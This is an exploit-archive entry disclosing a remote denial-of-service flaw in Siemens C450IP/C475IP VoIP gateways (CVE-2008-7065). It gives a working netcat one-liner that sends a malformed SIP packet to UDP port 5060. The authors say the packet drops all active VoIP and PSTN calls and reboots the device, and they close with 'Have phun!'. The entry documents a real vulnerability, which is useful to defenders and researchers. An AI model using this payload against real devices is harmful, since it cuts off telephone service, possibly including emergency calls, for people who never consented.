Siemens C450IP/C475IP Remote Denial of Service Vulnerability

# Title: Siemens C450IP/C475IP Remote Denial of Service Vulnerability
# EDB-ID: 7220
# CVE-ID: (2008-7065)
# OSVDB-ID: (50274)
# Author: sky & Any
# Published: 2008-11-24
# Verified: yes
# Download Exploit Code
# Download N/A

Hi,

echo -e "X sip:s X\nFrom:<sip:@x>\nTo:<sip:@x>\n" | nc -q0 -u <target> 5060

Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.

Tested with current firmwares.

Vendor (Siemens) was contacted 11/2007, no fix supplied yet.

Have phun!

sky & Any

# milw0rm.com [2008-11-24]